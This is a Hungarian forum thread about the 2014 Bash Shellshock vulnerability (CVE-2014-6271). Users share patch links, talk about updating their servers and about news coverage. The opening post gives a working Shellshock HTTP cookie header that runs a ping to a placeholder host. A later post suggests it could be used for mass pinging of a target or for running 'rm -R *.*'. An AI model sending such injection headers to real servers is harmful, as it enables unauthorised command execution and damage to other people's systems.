[Re:] [Gdi:] CVE-2014-6271 - BASH Shellshock vulnerability - BLOGOUT fórum

üzenetek

hozzászólások


Gdi
(senior tag)
Blog

http-header = Cookie:() { :; }; ping -c 3 <HOSZT>
:(

Patch infók:
Debian
Novel, SUSE
CentOS
Ubuntu

[ Szerkesztve ]


beleszólok
(senior tag)
Blog

Két dolgot nem értek:
1. Miért nem lett ebből címlapos hír az itcafe-n?
2. A hozzászólásod első sora, azt hová kell elhelyezni, hogy működjön?
Az eddigiekből nekem az jött le, hogy ez csak ott gáz, ahol bash scriptek is használhatóak CGI futtatásra, de úgy tűnik, félreértettem amit a redhat.com-on olvastam.


Speeedfire
(nagyúr)
Blog

Nekem ma már jött is este a frissítés. :))


Gdi
(senior tag)
Blog

#2
1: Index.hu-ra felkerült :)
2: a kiszolgáló felé intézett http kérésbe.

Ebben a blogban a szerző pingelteti saját ipjét, hogy felmérje mennyire elterjedt a hiba. Ezzel a módszerrel.
A kiszolgáló felé intézett kérésben kell benne lennie.

Na ezt most képzeld el sok szervertől, sok pinggel, egy célpont felé.
vagy neagyisten sok félig nyitott kapcsolattal, amit frissítget timeouton belül.
de valami rm -R *.* is tud meglepetést okozni.

#3
Valahol az internet egyik legsötétebb bugyrában Debian SID-del üzemeltetem a levelezőkiszolgálóm (mert akkoriban csak abban a repoban volt dovecot2) oda még nem jött. De most átrakom wheezyre.

[ Szerkesztve ]


beleszólok
(senior tag)
Blog

Index.hu-t inkább hagyjuk ilyen témákban! ;)
Sajnos az egyetlen szervert, amin kipróbálhattam volna, már frissítettem, idegen rendszereken meg nem próbálkoznék.


Gdi
(senior tag)
Blog

Egy kevés keserű szájíz társul hozzá, hogy "ott persze fent van".
De HUPon ott van!

Ilyenkor egy picit sajnálom, hogy nincs már Buherablog :(


beleszólok
(senior tag)
Blog

Én nem csak ilyenkor. Úgy általában. Nem mondom, hogy nem tette paranoiássá az olvasókat, de ott legalább nyomokban arról is szó volt, amit most csak millió, kétes megbízhatóságú forrásból tudok összekapirgálni, ha megerőltetem magam. De lusta vagyok. :(

Hup-on is gyorsabb volt valamelyik tag, mint a házigizda.

[ Szerkesztve ]

üzenetek